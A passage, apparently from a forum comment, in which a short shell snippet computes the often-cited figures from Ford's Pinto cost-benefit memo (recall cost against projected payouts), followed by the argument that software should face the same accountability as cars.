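# Commonly cited figures from Ford's cost-benefit memo (illustrative only).
VEHICLES=12500000   # ~11M cars + ~1.5M light trucks
FIX=11              # estimated cost of the fix, dollars per vehicle
RECALL_COST=$(( VEHICLES * FIX ))
# Projected payouts: 180 burn deaths, 180 serious burn injuries, 2100 burned vehicles
PAYOUT_COST=$(( 180 * 200000 + 180 * 67000 + 2100 * 700 ))
echo "Cost of fixing every vehicle: \$$RECALL_COST"   # $137500000
echo "Projected accident payouts:   \$$PAYOUT_COST"   # $49530000
```

On those numbers, paying out claims is roughly a third the cost of the fix, which is exactly the parent's point about why business incentives alone weren't enough.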
So why should we treat software any differently?